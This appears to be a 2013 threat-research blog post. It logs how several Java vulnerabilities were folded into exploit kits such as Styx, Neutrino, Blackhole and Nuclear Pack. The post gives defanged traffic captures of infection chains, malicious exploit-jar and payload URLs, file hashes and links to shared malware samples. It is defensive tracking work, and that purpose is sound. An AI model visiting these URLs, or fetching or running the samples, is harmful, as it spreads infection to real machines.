2013-08-15 - Exploit Integration

CVE-2013-2465/CVE-2013-2471/CVE-2013-2463 integrating Exploit Kits -- jre7u21 CVE- jre6u45 and earlier

Two days after disclosure, CVE-2013-2465 is starting to be integrated in Exploit Kits.
What makes it "better" than CVE-2013-2460 (recently integrated in Private Exploit Pack) is that it's targeting all Java branch 6 (update 45 included)

<edit4> NB: Have been told that it crashes with jre6 <= 18 </edit4>

Here is it in
Styx "Kein Edition" :
(this is Styx, but that instance was named Kein in the past)

CVE-2013-2465 successful pass in Styx "Kein Edition"

GET http://www3.upziaixl5c0vi0.4pu .com/?26wu4g7=Vqbg2XGaXerZ3qaSmaicbomc6aZdZlzr6aCkbKbSr52am6vRZpVU
302 Moved Temporarily to http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ1M%2FMbqqZyNvW43a3hn6e1eSmn5Zpm5Di16Pfp66ZyeLYrpvEe3ixj9jc6NGboOPY3Nvcl%2BqZytyxtX6Lm6O1nKKXpZRqm6GhnJ%2BOpOvU2%2B7nrmqLqZzcpqKZnplf197foZuZk6ynoKun1mqXWKfrpqKcpZxulKKkl5aOlebgyOLirrDcqWam3uHj18ei29aox5bemqehm%2Bnpn5zUn1nr3uXZq8%2Bs2NPrztOOo9zZpOHo5amKZXSdm7eOoKysyNzqksnUmtre2ujmn5zUn1iqr%2BPO0s%2Brkdrb1Iubd%2Bzl056ntaHZpqOdnLKOoKxelbDU0M%2FJpOXY3qmkp2fXp1iqr%2BXN4YtrqdPhksnPmpymraqqlQ%3D%3D

GET http://www1.e23xiqinf9cjsdfh.4pu .com/i.html?1wsgytq9=VezYzrbn0qjWnVnt0tWmn5Zpk6OZ1M%2FMbqqZyNvW43a3hn6e1eSmn5Zpm5Di16Pfp66ZyeLYrpvEe3ixj9jc6NGboOPY3Nvcl%2BqZytyxtX6Lm6O1nKKXpZRqm6GhnJ%2BOpOvU2%2B7nrmqLqZzcpqKZnplf197foZuZk6ynoKun1mqXWKfrpqKcpZxulKKkl5aOlebgyOLirrDcqWam3uHj18ei29aox5bemqehm%2Bnpn5zUn1nr3uXZq8%2Bs2NPrztOOo9zZpOHo5amKZXSdm7eOoKysyNzqksnUmtre2ujmn5zUn1iqr%2BPO0s%2Brkdrb1Iubd%2Bzl056ntaHZpqOdnLKOoKxelbDU0M%2FJpOXY3qmkp2fXp1iqr%2BXN4YtrqdPhksnPmpymraqqlQ%3D%3D
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh.4pu .com/zpdr.html
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh .4pu.com/jvvn.html
200 OK (text/html)

GET http://www1.e23xiqinf9cjsdfh .4pu.com/BlUrdse.jar
200 OK (application/java-archive) a57c6b750f4ad08816086af89fe79fc6 File: Owncloud via goog.gl

Piece of CVE-2013-2465 in Styx "Kein"

GET http://www2.d-93mv3zwkzkt.co7 .us/?qj7xbjj33e=lc2k3J%2FP4phZ2s2RdmSdpmOznd%2Fu17Gmm5mtlqOcZpiWllOtpqqnZrGtoKujpaSaXeTVp5tjY52KjpuV37OFzsKR6tTYrp1d64Y%3D&h=15
200 OK (application/octet-stream) 727aa2741cf1acfda34dd7d039950ea2 Simda

I will update this post as soon as I find it elsewhere.

<edit1 2013-08-16 18:00>
"When it rains, it pours" Timo Hirvonen about CVE-2013-2471 POC published on 2013-08-14.

Timo Hirvonen (F-Secure) Tweet about the CVE-2013-2471 Poc

Two days after publication code reach exploit kit too.
CVE-2013-2471 spotted in Kore Exploit Kit :
(aka Sibhost - Aka Urausy/BestAV EK)

Many thanks to Timo Hirvonen and Chris Wakelin for help.

CVE-2013-2471 Successful pass in Kore 2013-08-16

GET http://21sdtdzdrbzdrb8.3d-game .com:85/6N3M5P9z2L0KiXxnm5V9HonGcL7VP
200 OK (text/html)

GET http://21sdtdzdrbzdrb8.3d-game .com:85/jquery.js
200 OK (application/javascript)

GET http://21sdtdzdrbzdrb8.3d-game .com:85/6N3M5P9z2L0KiXxnm5V9HonGcL7VP1.zip
200 OK (application/octet-stream) f32de44a0886a75af7aa5285a66707de File : http://goo.gl/UQ7mhq

CVE-2013-2471 in Kore

GET http://21sdtdzdrbzdrb8.3d-game .com/6N3M5P9z2L0KiXxnm5V9HonGcL7VP?id=1&text=620
200 OK (text/html) <-- Call back after successfull infection

Payload is Urausy.
</edit1>
<edit2 2013-08-17>
CVE-2013-2465 spotted in ~~Redkit~~ x2o :

<edit3>This is NOT Redkit. Sorry about that. Thanks @xio_security. </edit3>
<edit7> We'll refer to this exploit kit as x2o (based on the text we can find now in the landing), as long as we do not know it's official name. This really looks like a "Redkit Light" (as @EKWatcher wrote) </edit7>

CVE-2013-2465 successfull pass in ~~Redkit~~ x2o

GET http://heimstaette-baerau .ch/blog/?p=5643
200 OK (text/html)

GET http://heimstaette-baerau .ch/blog/zps.fe54
200 OK (text/html)

GET http://heimstaette-baerau .ch/blog/rebza.tmp
200 OK (application/java-archive) 0996091c7bca0375cef3fb85bbc39af4 File here (Owncloud via goo.gl)

Piece of CVE-2013-2465 in ~~Redkit~~ jar 2013-08-17

GET http://heimstaette-baerau .ch/download.asp?p=1
200 OK (application/octet-stream) Karagny (??) - Decoded : ea40fee41c877f33b48125dbe92151bf

Sakura : CVE-2013-2471 :
Thanks to Chris Wakelin for providing a referer.

CVE-2013-2465 sucessfull pass in Sakura 2013-08-17

GET http://28holo.iyupinaiqu.slupsk .pl:52/round.php
200 OK (text/html)

GET http://28holo.iyupinaiqu.slupsk .pl:52/groundmembers.b200 OK () 21b414d722e79f0af3fb8b1ec3a10d26 File here (Owncloud via Goo.gl)

CVE-2013-2471 in Sakura 2013-08-17

GET http://28holo.iyupinaiqu.slupsk .pl:52/25747.a
200 OK (application/octet-stream) Zaccess. Decoded : 64fca5d4cc118384a1dd4d12d1028914

</edit2>
<edit4 2013-08-18>
Neutrino : CVE-2013-2465 :
In Neutrino now : (not 2471 as previously written. Thanks Chris Wakelin).

CVE-2013-2465 successful pass in Neutrino 2013-08-18 =)

GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/hhmblrbxccy?grxxbc=1492014
200 OK (text/html)

GET http://ajax.googleapis .com/ajax/libs/jquery/1.9.1/jquery.min.js
200 OK (text/javascript)

GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/index.js
200 OK (application/x-javascript)

POST http://bcmgmychnitfsyrfhysjj.podzone .org:8000/nbmucsyxv
200 OK (text/html)

GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/exrybkyrvdjes?yegpmkpd=noksqa
200 OK (application/java-archive) 46e2cc42dba10e6de72fbdacc5bf1b9d File Here (Owncloud via goo.gl)

Piece of CVE-2013-2465 in Neutrino jar 2013-08-18

GET http://bcmgmychnitfsyrfhysjj.podzone .org:8000/zdalnfookkkic?yjnhbik=noksqa
200 OK (application/octet-stream) Payload once decoded was : 5d6d892cdc7d580839d0947fa983775c
</edit4>
<edit6 2013-08-20>
Blackhole Exploit Kit : CVE-2013-2465

CVE-2013-2465 positive pass in Blackhole Exploit Kit 2013-08-20

Note : this is a Blackhole in "EKaas" using API ( domain and path are fast rotating).

GET http://mlbrsd.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php
200 OK (text/html)

GET http://mlbrsd.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php?gktBn=atztcBRX&yBeNSyNyLEgI=rIiTF
200 OK (application/java-archive) 6cf6091c11a9fdf2fe23afcfd39010e8 File here

Piece of CVE-2013-2465 code in BH EK & Cool EK 2013-08-20

GET http://isuvnw.xx2.peoplesearcherstuners .org/2c6f1/components_cums_affecting/persuade_chips-install.php?sf=52322h2f32&be=532f553155532j552g32&y=2d&eZ=V&RR=L
200 OK (application/x-msdownload) Payload once Decoded : fc4fb9bedb0c3f57d4eb824308ea15ab

Note : Author announce CVE-2013-2471 :)

Cool EK : CVE-2013-2465 (exact same file as Blackhole)

GET http://degnera.realdealdemocracy .com:801/hard_piece-core_sulphur.php
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/send_civic.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/quietly-sort-withdrawal_unity.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/tame_knight-courage.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/determine-syntactic_winner.html
200 OK (text/html)

GET http://degnera.realdealdemocracy .com:801/diagnosis_hemisphere_energy.jar
200 OK (application/java-archive) 6cf6091c11a9fdf2fe23afcfd39010e8 File here

Piece of CVE-2013-2465 code in BH EK & Cool EK 2013-08-20

GET http://degnera.realdealdemocracy .com:801/diagnosis_hemisphere_energy.txt?e=20
200 OK (application/x-msdownload) c973b3c58ec3bb04a43e649722e1e2f1 (didn't check but it should be Reveton/Live Security Professionnal)
</edit6>
<edit7 2013-08-21>
Flimkit : CVE-2013-2471:

CVE-2013-2471 successful pass in Flimkit 2013-08-21
The 404 is callback for stats after successful infection

GET http://sezipahomez .net/tzsufxoh
200 OK (text/html) <-- landing is built upon antivirus company page rip (Avast, Symantec, etc...)

Piece of Landing source code
(based on code duplicated from multiple Antivirus Vendors websites)

GET http://sezipahomez .net/ewreucbfvzzegaavotaw.jar
200 OK (application/java-archive) 99e5dcf1fcb880fa86e967826549e625 Files here (Owncloud via goo.gl)

CVE-2013-2471 in Flimkit (Payload in the jar)

Decoded payload from the jar : 480848172062f4e63909b43aab5013be

GET http://sezipahomez .net/vdvsvtzxorybrzbwpck
404 Not Found (text/html) (call back on successful infection - for statistics purpose)
</edit7>
<edit8 2013-08-24>
Glazunov : CVE-2013-2471
It seems an attempt to integrate this CVE was already here 4 days ( 882efabd68fc28919ca5704d30f1de92 ) ago but no infection.
Did not spend time to understand why. Seems it was "fixed" 2 days ago.

CVE-2013-2471 positive pass in Glazunov 2013-08-24

GET http://212.124.115.231-static.reverse.softlayer .com:8080/2634432140/589
200 OK (application/javascript)

GET http://212.124.115.231-static.reverse.softlayer .com:8080/2634432140/8.zip
200 OK (application/x-java-archive)

GET http://212.124.115.231-static.reverse.softlayer .com:8080/2634432140/8.zip
200 OK (application/x-java-archive) 48bc7092e96ea572a2ca4cc683b48fc3 Files (win and fail(?) ) here

Piece of CVE-2013-2471 in Glazunov 2013-08-24

GET http://212.124.115.231-static.reverse.softlayer .com:8080/27841
200 OK (application/octet-stream) Payload : a89a6db9c9487453466cafa9613c743a Zaccess
</edit8>
<edit9 2013-08-26>

Timo Hirvonen from F-Secure spotted the CVE-2013-2463 in the last Neutrino jar pushed for jre6u45.

Neutrino switched from CVE-2013-2465 to CVE-2013-2463 :
23e162d59f83a0b2fc1048ddd99720a4 Sample here.
1edb56eb2b79965240752a34f52530bb 2013-08-27

Piece of CVE-2013-2463 in Neutrino Jar - 2013-08-26
(thx Timo for the Hints)

2013-08-27 Neutrino switch back to CVE-2013-2465...the reason is I would say that CVE-2013-2463 was not working for them (in fact no infection with it past 2 days).
</edit9>
<edit14 2013-09-06> It seems today CVE-2013-2463 is back in Neutrino and is working properly.
Waiting for confirmations before publishing </edit14>

<edit10 2013-08-27>
Cool EK switch to CVE-2013-2471 and payload in the Jar with Kore EK jar :

CVE-2013-2471 with Payload in the jar too in Cool EK 2013-08-27

GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/fair_pollution-yacht_character.html
200 OK (text/html)

GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/second_wall.js
200 OK (text/javascript)

GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/client_restore-maximum_nurse.jar
200 OK (application/java-archive) a480ad85251536c5c1382f1eea55e1a9

GET http://iefn-sydneyiteticklybenders.shortnorthrunningclub .com:972/wherever_orange.txt?e=21
200 OK (application/x-msdownload) Reveton 6b712002ab0aaf54f1a9602d9158054c
</edit10>
<edit11 : 2013-08-30>
Gong Da : CVE-2013-2465 :
Chinese Exploit Pack Updated - KahuSecurity - 2013-08-29
</edit11>
<edit12 2013-09-04>
Nuclear Pack : CVE-2013-2471

CVE-2013-2471 successful path in Nuclear Pack vs Win7 x64 jre16u45
+ Payload (TitanAntivirus) activity

GET http://eixxs1sd.shetbetpeoch .biz:29991/c4700fff73601cb826054e2c10d5ca26.html
200 OK (text/html)

GET http://eixxs1sd.shetbetpeoch .biz:29991/3c3846e79f3b02ffae9a7236558ee437/1378324484/c3a3594767f485702008396f568d36e6.jar
200 OK (application/java) 570b794f3ea75e25a29c12140bccdee1

Piece of CVE-2013-2471 code in Nuclear Pack jar

GET http://eixxs1sd.shetbetpeoch .biz:29991/3c3846e79f3b02ffae9a7236558ee437/1378324484/c3a3594767f485702008396f568d36e6.jar
200 OK (application/java)

GET http://eixxs1sd.shetbetpeoch .biz:29991/f/1378324484/c3a3594767f485702008396f568d36e6/3c3846e79f3b02ffae9a7236558ee437/2
200 OK (application/octet-stream) 1684947fed73c0e3c2264a990b0ae88a (out of topic : Titan Antivirus 2013 fake AV)

GET http://eixxs1sd.shetbetpeoch .biz:29991/f/1378324484/c3a3594767f485702008396f568d36e6/3c3846e79f3b02ffae9a7236558ee437/2/2
200 OK (application/octet-stream)

Jar and samples here.

</edit12>
</edit13 2013-09-09>
GrandSoft : CVE-2013-2463
Read: Finally, here is.... GrandSoft - 2013-09-09
</edit13>
<edit14>
Exploit kits vs jre17u21 2013-09-15 :http://pastebin.com/raw.php?i=G97kiNPv
Infection via click2play and CVE-2013-2471 for Sweet Orange, Glazunov and KoreIsh Cool EK
Quite surely Kore too.
</edit14>

Read more :
CVE-2013-2465 Full disclosure - 2013-08-12 - Seclists.org
CVE-2013-2471 Full disclosure - 2013-08-14 - Seclists.org
CVE-2013-2463 Full disclosure - 2013-08-19 - Seclists.org